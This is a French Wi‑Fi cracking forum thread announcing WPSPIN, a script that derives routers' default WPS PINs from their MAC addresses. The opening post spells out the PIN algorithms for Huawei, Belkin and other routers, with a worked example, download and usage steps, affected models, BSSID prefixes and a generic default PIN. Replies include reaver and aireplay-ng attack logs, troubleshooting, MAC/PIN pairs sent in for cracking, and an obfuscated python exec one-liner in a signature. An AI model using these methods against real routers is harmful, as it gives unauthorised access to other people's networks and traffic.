Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-12-2012 06:07:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Bonne nuit smile

  Ça y est, nous avons sortis les tools cette nuit sur le forum espagnol, je peux donc m'exprimer librement tongue
L'histoire commence vers cette époque TP-Link "réagit" contre la faille WPS,
J'étudiais des données de routeurs mis en services par une filiale d'orange en espagne, essid FTE-XXXX (en souvenir de France TElecom),
En jouant avec la mac et l'essid, je me suis vite rendu compte que ces deux éléments gardaient une relation directe avec le sériel en base duodécimale. Diviser des numéros  de 8-9 chiffres par 12 et tomber sur un entier à chaque coup est encourageant smile : Il y a un système logique et calculé derrière tout ça, reste à le trouver

  En regardant un peu plus qu'elle ne fût pas ma surprise de constater que le PIN WPS avait lui aussi une relation presque directe avec le bssid. En convertissant la fin de la mac a décimal vous obteniez genre 5-6 chiffres sur 8 du PIN. roll
Comme nous savons que le dernier est un checksum, ça représentait au maximum deux chiffres inconnus soit 100 PIN possibles. j'étais relativement content avec un brute force sur 100 possibilités maximum, c'est bien mieux que 11 000 possibilités.

  Je communique heureux ma petite découverte à un collègue (Compota). Celui ci me réponds quelques instants plus tard en me disant enthousiaste qu'il vient d'essayer avec  un autre grand ISP d'ici en Espagne (vodafone) qui utilise des box HG566a de HUAWEI (même fabricant) et qu'il a des données sous les yeux et que là aussi il y a une relation entre fin bssid convetit à décimal et le PIN.
Et dans ce cas là c'est encore plus simple vu que l'on obtient 7 chiffres du PIN, le huitième étant le checksum, nous obtenons le PIN par défaut. smile

  Qu'un même constructeur utilise deux algorithmes très proches avec des modèles différents est quelque chose de compréhensible

  Le plus effarant fût de voir le même algorithme chez un concurrent du géant chinois, et pas n'importe lequel vu que c'est the number one or two aux USA: Belkin hmm
  Et puis pas sur n'importe quels routeurs, ce sont les derniers sortis " N, dual-band 450 mbps, 100$ etc..."
  Ajouttez à cela que nous nous sommes rendus compte que le même algorithme avait été utilisé avant et mis en avance par ZaoChuseng dans compute PIN (malheureusement le site de beini est off) sur un routeur tenda (marque chinoise qui s'exporte très bien en Angleterre)...
  Surtout que comme vous allez le voir, on ne peut vraiment pas dire qu'il aient cherché midi à quatorze heure.

faille numéro 1 similaire à celle découverte par ZaoChesung sur rouetur Tenda   
  Vous prenez les trois derniers paires du bSSID du point d'accès et vous passez à décimal.
  Vous ajoutez le checksum et le tour est joué.

  Lorsque Spawn a mis le full-disclosure pour belkin, je n'ai rien dis mais ça me faisait mal aux yeux vous allez voir pourquoi... lol
Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Prenons ces données

F5D8235-4 v 1000
Belkin_N+_433A6C       
00:22:75:43:3A:6C
WPS PIN:               44058685                                             
WPA PSK: 4084ffc11d82eab5

Là ils sont vraiment gentil car l'essid est égal à la partie du bssid qui nous interesse, le PIN est donnés deux fois tongue

Selection_020.png

En effet, ça fait mal aux yeux, grâce a antares_145 ou Spawn nous faisons notre petit script et nous calculons le checksum et nous avons le PIN complet...
Coder la fonction du checksum sur le huitième chiffre des PIN WPS

Veŕifions un petit coup pour le plaisir

label3.JPG


Avec un petit snapshot du tool, pour le plaisir aussi

OtFk.png

 
  L'algorithme pour FTE, celui qui m'a fait mettre le doigt dans l'engrenage est un peu différent dans le choix des valeurs de base  mais c'est le même concept.

faille numéro 2 sur HG532c de HUAWEI distribués par france télécom-orange avec essid FTE-XXXX en Espagne
    les essid FTE sont du type FTE-XXXX ou X es hexadécimal majuscule (de FTE-0000 à FTE-FFFF )
   Si vous observez les 4 "X" (les caractères hexadécimaux)  du eSSID avec les 4 dernier chiffres du bSSID vous obtenez toujours trois types de différence entre bssid et essid : +7 ou -1 ou -7 (ce qui nous permet proposer trois PIN possibles lorsque nous ne connaissons pas l'eSSID wink )
   Pour former votre PIN vous prenez la 4ème paire de la mac (les Y dans cet exemple: ZZ:ZZ:ZZ:YY:ZZ:ZZ)
   vous ajoutez les quatre caractères hexadécimaux du eSSID ( ça nous fait YYXXXX )
   vous ajouttez 7 ( ça nous fait YYXXXX + 7 ) est vous convertissez à décimal

exemple:
si un essid FTE-0001 avec fin de mac 00:00:00, le PIN serait en base de la chaine 000001, on ajoutte 7, ce qui nous fait 000008.
Nous caluclons le checksum, là c'est facile vu que nous avons que des 0 etun 8 à la fin...
8x3=24, notre digit de contrôle est donc 4 (on enlève dizaine, centaines, tout ce qui n'est pas unité
checksum wps = 10 - digit de contrôle
soit 10 - 4 = 6

Notre PIN serait 0000008 et le checksum 6, >>>  00000086

UlHN.png


  Je n'ai pu essayer qu'avec des box courantes en Espagne. J'ai regardé des données tp-link, d-link et netgear et ce n'est pas le même algorithme. Le reste... essayez! smile
Petit détail: et si notre valeur en décimal a huit chiffres, ne vous inquiétiez pas, quittez le premier, gardez les 7 derniers, appliquez le checksum et le tour et joué wink
  Et si votre valeur décimal est de 6 - 5 - 4 chiffres etc,,, vous rajoutez allègrement des 0 en début jusqu'à arriver à 7 chiffres et vous ajoutez le checksum et c'est dans le sac. C'est ce que nous venons de faire avec l'exemple pour FTE précédant wink
Voici le petit tool



0byd.png


+-----------------------------------------------------------------------------------------------+
|                              TELECHARGEMENT v. 1.4 >    WPSPIN                               |
+-----------------------------------------------------------------------------------------------+




+-----------------------------------------------------------------------------------------------+
|                               TELECHARGEMENT v. 1.3 >    WPSPIN                              |
+-----------------------------------------------------------------------------------------------+

+-----------------------------------------------------------------------------------------------+
|                              TELECHARGEMENT v. 1.1 >    WPSPIN                               |
+-----------------------------------------------------------------------------------------------+




Et je vous mets les liens pour télécharger les versions pour windows,
vous avez PIN'GUI de maripuri, petit tool soigné exécutable avec Wine sans soucis.
Téléchargements > PIN'GUI by Maripuri
  Et l'application automatique de betis-jesus (celle ci travaille avec les drivers wireless windows donc a priori ça ne fonctionnera qu'avec Windows et pas de support pour XP)
Téléchargement >   wpspin by betis jesus (automatique)



I. USAGE



1> décomprimer le fichier

Unzip WPSPINfr.zip

2> situez vous avec cd dans le fichier décomprimé

(vous pouvez faire click droit "open terminal here" dans le fichier décomprimé)

3> Exécutez le script

bash WPSPIN.sh

II. DISPOSITIFS VULNËRABLES



Voici la liste des routeurs affectés

+-----------------------------------------------------------+------------------------------------------------------------------------------------+
|                    FABRICANT                                        |                                 MODELE                                       
+-----------------------------------------------------------+------------------------------------------------------------------------------------+
|                        HUAWEI                                          |                         HG532c "Echo Life"                               
|                        HUAWEI                                          |                                 HG566a                                       
|                         Belkin                                             |                       F5D8235-4 v 1000                                 
|                         Belkin                                             |                        N900 F9K1104v1                                 
|                         Belkin                                             |                       F5D8231-4 ver.5000                             
|                         Teldat                                             |                           iRouter1104-W                                 
|                         Zyxel                                               |                                NBG-419n                                   
|                         Zyxel                                               |                            P-870HW-51A V2                             
|                         Zyxel                                               |                           P-870HNU-51B
|                       Comtrend                                          |                                AR-5387un                                 
|                       Comtrend                                          |                            Gigabit 802.11n                               
|                    ADB-Broadband                                   |                               PDG-A4001N                                 
|            OEM Shenzhen Gongjin Electronics           |                         Encore ENDSL-4R5G                           
|                  OBSERVA TELECOM                           |                            AW4062 (Tecom)                               
|                     Conceptronic                                      |                              c300brs4a                                     
|                        SAMSUNG                                       |                           SWL (Samsung Wireless Link)             
|                           Tenda                                            |                                 W309R                                   
+-----------------------------------------------------------+------------------------------------------------------------------------------------+



CONSULTEZ LA LISTE DE BSSID ACTUALISËE EN LIGNE EN CLIQUANT SUR LE LIEN SUIVANT
CLIQUEZ ICI POUR VOIR LA LISTE DES BSSID

III. CHANGELOG WPSPIN



10 décembre 2012 16:13 :
Inclut les règles nécessaires pour les PIN commençant par un ou plusieurs 0. Merci à atim et telstra pour le feed-back très rapide permettant de couvrir cette possibilités qui n'avait pas été codifiée.
10 diciembre 2012 21:28 :
Nouvelle mac supporté  : 6A:C0:6F (HG566 avec essid vodafoneXXXX )
29 janvier 2013 11:14 :
  Code révisé
  Ajout des PIN génériques connus grâce au travail d'investigation mené au sein de lampiweb,com
Soit 6 routeurs nouveaux !
De plus nous avons
  - 7 bSSID nouveaux vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
  - 2 bSSID nouveaux WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
  - 2 nouveaux dispositifs affectés:
      1) SWL (Samsung Wireless Link), eSSID par déafut SEC_ LinkShare_XXXXXX.  2 bssid affectés connus > 80:1F:02 / E4:7C:F9
      2) Conceptronic  c300brs4a  (eSSID par défaut C300BRS4A ) bssid connu > 00:22:F7   
  Ajout règles de vérifications de r00tnull (validité bSSID, amélioration du filtre eSSID FTE)
  Plus d'information en sortie (modèle routeur, fabricant etc...)
  Ajout filtre essid pour les bssid avec plusieurs type d'essid par défaut (confusion sur certains modèles entre telefoncia et jazztell)
  Optimisations du code, voir les annotations de celui-ci pour plus de détails
31 janvier 2013 4:45 :
-Corrigé le bug pour HG532c (j'avais oublié une ligne...)
-Ajout de nouvelles règles pour essid FTE en mode essid connu (mac doit coïncider avec base de données, vérification de la validité de la différence essid - bssid)
-1 nouveau dispositif au tableau de chasse:
Zyxel,  P-870HNU-51B avec  essid WLAN_XXXX. bssid connu et supporté FC:F5:28:XX:XX:XX, wps activé par défaut, PIN Générique 20329761

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-12-2012 06:36:16

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Wow, Chapeau bas Monsieur ! Bravo smile

Didou dis donc, après le WEP l'Espagne devient le paradis du WPS alors smile

Hors Ligne

#3 09-12-2012 11:47:32

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Merci, vraiment du très bon travail wink



Bravo encore à vous et merci de faire le partage wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#4 09-12-2012 13:21:12

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

_|||_


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 09-12-2012 17:37:40

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

- Tu avais mis "Beklin" au lieu de Belkin, j'ai édité.
- Le tool est en backup ici au cas ou: WPSPIN
- Le sujet est épinglé
- Ca me rappelle la bonne époque des Bbox
- Bien joué!!! big_smile

Hors Ligne

#6 10-12-2012 21:14:54

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Merci pour l'accueil, ça fait vraiment très plaisir smile

Premier changelog >

10 décembre 2012 16:13 :
Inclut les règles nécessaires pour les PIN commençant par un ou plusieurs 0. Merci à atim et telstra pour le feed-back très rapide permettant de couvrir cette possibilités qui n'avait pas été codifiée.

J'ai modifié le lien en premier post

deuxième changelog >
10 décembre 2012 21:28 :
  Nouvelle mac supporté : 6A:C0:6F (HG566 avec essid vodafoneXXXX ), merci à Betis-Jesus pour les données

Hors Ligne

#7 11-12-2012 12:10:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

¡ Ay Carajo ! Chicos, me quito el sombrero... Mis respetos a todo el equipo del Lampiweb !

'Tain, mais c'est quand même énorme ! Un algorithme à la c*n refilé entre les différents opérateurs, et paf, accès au réseau. Je crois qu'on a un truc qui peut faire du bruit, y a vraiment des jours où j'me dis qu'ils le font exprès ! big_smile

Reste à tester tout ça sur un maximum de routeurs, on est peut-être pas au bout de nos surprises ! Maestro, t'as testé sur du TP-Link ? Je n'ai plus le PIN par défaut du mien... A l'occasion je testerai sur d'autres routeurs/box, maisl à pour l'instant j'ai rien à portée.

Je n'ai pas encore étudié le code-source, mais il semble loin le temps où tu avais besoin de notre aide pour coder une fonction (j'attendais ton code en beta moi !! tongue), c'est du beau boulot. Bon, j'y jetterai un œil quand même, et je te ferai part d'un avis plus technique au cas où wink

Podrás transmitir mis felicidades a Doña Maripuri (si no pasa por aquí en persona) wink

Dernière modification par antares145 (11-12-2012 23:29:25)

Hors Ligne

#8 11-12-2012 17:33:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

J'ai encore du mal à assimiler cette hsitoire surtoiut que j'étais très focalisé sur le thème HG532c avec essid FTE-XXXX et que ça s'est mis à déborder joyeusement dans tous les sens.
TP-Link je n'ai pas pu tester, par contre le video de wps-crack se fait sur un tp-link et on peut voir les données  et ce n'est pas le même algorithme.
C'est peut être la deuxième paire de la mac et les 4 chiffres de l'essid passés à décimal tongue
Les Netgear CGXXXXN aussi sont "intéressants" parce que c'est du deux en un avec la clef wpa par défaut de 10 chiffres dont 7 sont les 7 premier du PIN wps. Dans le même ordre.

antares_145 a écrit :

Je n'ai pas encore étudié le code-source, mais il semble loin le temps où tu avais besoin de notre aide pour coder une fonction (j'attendais ton code en beta moi !! ), c'est du beau boulot. Bon, j'y jetterai un œil quand même, et je te ferai part d'un avis plus technique au cas où

Tu vas te marrer je crois lol Je t'avais envoyé un petit quelque chose dans un mail mais je pense que c'était pas un moment adéquat wink
Le script a définitivement besoin d'un bon coup d'oeil roll et je compte de toute façon le reprendre ne serait ce que pour l'épurer et inclure les PIN génériques dont je dispose.
Et pour inclure les nouveaux à venir tongue nux
Doña maripuri esta algo ocupàda de momento, seguro que pasará por aquí en cuanto este menos solicitada. Le daré la enhorabuena de tu parte. smile

Hors Ligne

#9 18-12-2012 19:28:52

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Bonjour/Bonsoir , Je suis nouveau désolé si je poste pas dans le bon topic

J'ai essayé avec le génerateur de PIN  sur un DELINK mais ça n'avance pas  , pourtant avec la commande wash -i mon0 le wps est n'est pas bloqué . voilà ce que ça donne :

Tapez le numéro de l'option choisie et tapez <Enter> : 1                                               

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from xxxxxxxxxxxxxxxxxx
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 1
[+] Associated with xxxxxxxxxxxxxxxx (ESSID: xxxxxx)
[+] Trying pin xxxxxx
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 1
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Le DELINK n'est pas vulnerable ?

Ensuite sur netgear : ( je tien à préciser que je lance d'abord aireplay-ng  sinon j'ai des erreurs WPS transaction failed (code: 0x02), re-trying last pin )

[email protected]:~# aireplay-ng mon0 -1 120 -a  xxxxxxxxxxxxx -e xxxxxxxx -q1
No source MAC (-h) specified. Using the device MAC (xxxxxxxxxxxxxx)
13:54:48  Waiting for beacon frame (BSSID: xxxxxxxxxxxxxx) on channel 1

13:54:48  Sending Authentication Request (Open System)

13:54:50  Sending Authentication Request (Open System)

13:54:52  Sending Authentication Request (Open System) [ACK]
13:54:52  Authentication successful
13:54:52  Sending Association Request [ACK]
13:54:52  Association successful :-) (AID: 1)


Ensuite reaver me donne ça :


[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 90.91% complete @ 2012-12-18 13:57:32 (0 seconds/pin)
[+] Trying pin xxxxxxxx
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.
[email protected]:~/WPSPINfr

J'ai deux questions :

1-Le PIN  c'est le bon je pense ,  enfin c'est le génerateur qui l'a choisit  mais ça n'atteint que 90.91% et à chaque essai c'est la même chose .  Pourquoi ?

2- comme vous voyez même si je lance aireplay-ng  le [!] WPS transaction failed (code: 0x02), re-trying last pin   apparait , Une solution ?

C'est tout  , merci .

Dernière modification par abradacabra (18-12-2012 19:43:21)

Hors Ligne

#10 18-12-2012 21:24:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Je n'ai jamais pu essayer avec un D-Link, et pour ce qui est des netgear, nous avons en espagne pas mal de cg3100N et l'algorithme employé est différent.
Après dans les deux captures d'écran que tu mets, ton attaque avec reaver ne marche pas.

Hors Ligne

#11 19-12-2012 12:10:59

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

kcdtv a écrit :

Après dans les deux captures d'écran que tu mets, ton attaque avec reaver ne marche pas.

+1, je verrais plutôt cette question dans un topic de Reaver. Voire même son propre topic, c'est un problème plutôt spécifique.

Je penche pour deux pistes :
- la version de Reaver (1.4) qui ne supporte pas bien l'option "-p" => recompiler la dernière version SVN
- la liaison avec la box qui n'est pas bonne (genre trop loin), ça peut expliquer les timeout => se mettre à un meilleur endroit (pas trop près quand même)

Abracadabra (bienvenue sur le forum !) Si tu veux des détails sur ces pistes, merci de créer un nouveau sujet, le script WPSPIN.sh n'est pas le problème ici wink

Hors Ligne

#12 25-01-2013 23:34:51

maripuri
Membre
Inscription : 09-04-2010
Messages : 22

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

antares145 a écrit :

Podrás transmitir mis felicidades a Doña Maripuri (si no pasa por aquí en persona)

Je n'ai aucune excuse ni pardon 

antares145 merci .. il était d'une grande aide dans le travail du script pour WPSPIN. Les outils sont mis à jour v3 mais je vais lui kcdtv qui parlent de l'évolution du scénario ou l'interface graphique de Windows.

Salutations à des amis crack-wifi.com

Hors Ligne

#13 29-01-2013 11:00:10

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Update de WPSPIN!

  Voici une petite révision de WPSPIN !

29 janvier 2013
  Code révisé
  Ajout des PIN génériques connus grâce au travail d'investigation mené au sein de lampiweb,com
Soit 6 routeurs nouveaux !
De plus nous avons
  - 7 bSSID nouveaux vodafoneXXXX (HG566a) > 6A:3D:FF / 6A:A8:E4 / 6A:C0:6F / 6A:D1:67 / 72:A8:E4 / 72:3D:FF / 72:53:D4
  - 2 bSSID nouveaux WLAN_XXXX (PDG-A4001N de adbroadband) > 74:88:8B / A4:52:6F
  - 2 nouveaux dispositifs affectés:
      1) SWL (Samsung Wireless Link), eSSID par déafut SEC_ LinkShare_XXXXXX.  2 bssid affectés connus > 80:1F:02 / E4:7C:F9
      2) Conceptronic  c300brs4a  (eSSID par défaut C300BRS4A ) bssid connu > 00:22:F7   
  Ajout règles de vérifications de r00tnull (validité bSSID, amélioration du filtre eSSID FTE)
  Plus d'information en sortie (modèle routeur, fabricant etc...)
  Ajout filtre essid pour les bssid avec plusieurs type d'essid par défaut (confusion sur certains modèles entre telefoncia et jazztell)
  Optimisations du code, voir les annotations de celui-ci pour plus de détails



Consultez en ligne la liste de bssid et routeurs affectés en cliquant ici





+-----------------------------------------------------------------------------------------------+
|                               TELECHARGEMENT v. 1.3 >    WPSPIN                              |
+-----------------------------------------------------------------------------------------------+




UtWZ.png

UtXd.png

Hors Ligne

#14 29-01-2013 14:46:37

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Pas de D-link ni de NETGEAR ?

Hors Ligne

#15 31-01-2013 05:06:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

update 31-01-2013 04:46
-Corrigé le bug pour HG532c (j'avais oublié une ligne... lol )
-Ajout de nouvelles règles pour essid FTE en mode essid connu (mac doit coïncider ave base de données, vérification de la validité de la différence essid - bssid)
-1 nouveau dispositif au tableau de chasse:

+-----------------------------------------------------------------------+
|     fabricant             |            Zyxel                         
|  modèle routeur      |      P-870HNU-51B                     
|       essid                |        WLAN_XXXX               
|       bssid                |     FC:F5:28:XX:XX:XX         
|                                                                         
|                                                                         
|                     WPS activé par défaut                   
| 1 PIN WPS PAR DEFAUT POUR TOUS LES MODELES
|                       WPS PIN = 20329761                   
+-----------------------------------------------------------------------+


+-----------------------------------------------------------------------------------------------+
|                               TELECHARGEMENT v. 1.3 >    WPSPIN                              |
+-----------------------------------------------------------------------------------------------+

(les liens sont actualisés en premier post wink

Hors Ligne

#16 31-01-2013 05:51:53

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Merci smile

Hors Ligne

#17 31-01-2013 19:03:47

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Merci à toi smile

@ abracadbra:
Les modèles connus comme affectés par la faille sont ceux répertoriés dans le petit tableau récapitulatif du premier post et que tu peux consulter en ligne >

CONSULTEZ LA LISTE DE BSSID ACTUALISËE EN LIGNE EN CLIQUANT SUR LE LIEN SUIVANT
CLIQUEZ ICI POUR VOIR LA LISTE DES BSSID


Pour ce qui est de Netgear, le seul modèle équipé de WPS que j'ai pu analyser un peu c'est le CG3100x.
Ils sont très sensibles à une attaque menée avec wps-reaver mais Il est utilisé un algorithme différent de ceux mis en lumières par WPSPIN.
Je n'ai pas de données de routeur d-link, donc je ne peu rien te dire à ce sujet.

Hors Ligne

#18 11-06-2013 11:44:03

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Bonjour,
D'abord un grand bravo et merci pour vos découvertes

Je vous soumets pour étude une série de données pour routeur Technicolor (00:18:E7:XX:XX:XX) :

938028;15061591
941A8D;79489515
948BE4;37017422
9388E8;90467912
96C99F;12456789
A4CAFF;71095837
936D45;90427145
A10017;85801455

Merci de votre aide

Hors Ligne

#19 11-06-2013 15:13:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Pour pouvoir mener une étude il faut des données complètes

  - modèle exact du routeur
  - fabricant
  - version firmware
  - version hardware
  - numéro de série
  - bssid et autres mac associées
  - essid par défaut
  - PIN WPS
  - pasphrase WPA
 
  + Le wps est il activé par défaut?
  + Est il possible d'attaquer avec reaver?
  +  y'a t'il un blocage du WPS, une manœuvre spéciale à effectuer pour réussir l'attaque?


La seule chose que nous pouvons constater mais tu as du t'en rendre compte en mettant les données dans WPSPIN c'est que c'est un algorithme différent

Merci pour vouloir collaborer mais on travaille avec des données complètes, pas avec des moitiés de mac et leur PIN. wink

Hors Ligne

#20 11-06-2013 15:50:44

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Oui je comprends parfaitement

Voici les données complètes sur ce lien : http://www.jheberg.net/captcha/MhwGyF-tncap-rar

Le WPS est activé par défaut, cependant il y a un blocage de 5 minutes au bout de 3 tentatives erronées.

J'ai essayé avec Reaver, ça prend énormément de temps ( environ 70 secondes/PIN).

Merci pour ta réactivité wink

Hors Ligne

#21 11-06-2013 16:34:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Toi aussi tu es réactif wink

j'ai jetté un coup d'oeil rapidement et je n'ai rien vu qui puisse nous aiguiller hmm
Le mieux se serait d'ouvrir un thème d'investigation à part sur l'algo WPS et WPA de ce roiteur et FAI, avec les photos que tu as mis ça fait déjà une bonne base pour pouvoir élaborer et vérifier des théories.

Hors Ligne

#22 11-06-2013 16:45:02

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Ca marche j'ouvre un nouveau topic !

De ton côté tu ne pourrais pas essayer de retrouver l'algorithme WPS/MAC, c'est ce qui me semble le plus simple vu la complexité des pass WPA ?

Hors Ligne

#23 11-06-2013 17:08:23

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

mais il n'y pas forcément une relation  mac - PIN.... c'est d'ailleurs une erreur énorme que de baser l'algorithme   sur un élément qui serait communiqué deux fois, une fois dans l'essid, une fois dans le bssid...
On va essayer wink

Hors Ligne

#24 11-06-2013 21:53:37

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

Merci bien pour ta collaboration smile

Hors Ligne

#25 19-06-2013 12:58:45

TNCAP
Membre
Inscription : 19-06-2013
Messages : 13

Re : WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ...

salut tous le monde.
je suis nouveau sur ce super forum que je consultais fréquement sans pouvoir m'inscrire .mais aujourd'hui j'ai décidé de faire partie de votre communauté ,j'espère etre le bien venu smile
je m'intersse surtout au message de notre ami unsuns06
que je félicité vivement pour ce message .
c'est vrai que reaver n'arrive pas à générer les 4 premiers digit du pin de ce routeur TNCAPxxxxx .mais ce que tu as proposé comme donnée est trsé interssant .
essaye de voir le code wpa de ce routeur et sa taille qui est fixe de 10 caractère et essayons tous ensemble de généner des dicos spécialement pour ce type de routeur .puisque le wpa handshake est facilement obtenu .
voila une piste et bon courage à tous le monde.
10 caractére vaut 64 bits si on passe en alphanumérique ça donne 5 caratères

Dernière modification par TNCAP (19-06-2013 13:03:35)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
12 10381 22-11-2016 15:12:09 par kcdtv
26 15744 27-05-2016 23:07:29 par Fab955
5 1083 11-04-2016 14:17:44 par kcdtv
14 12272 05-10-2015 13:44:46 par BobX64
Problème WPSPIN par firstname01
6 1299 20-07-2015 23:33:01 par firstname01

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.055 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]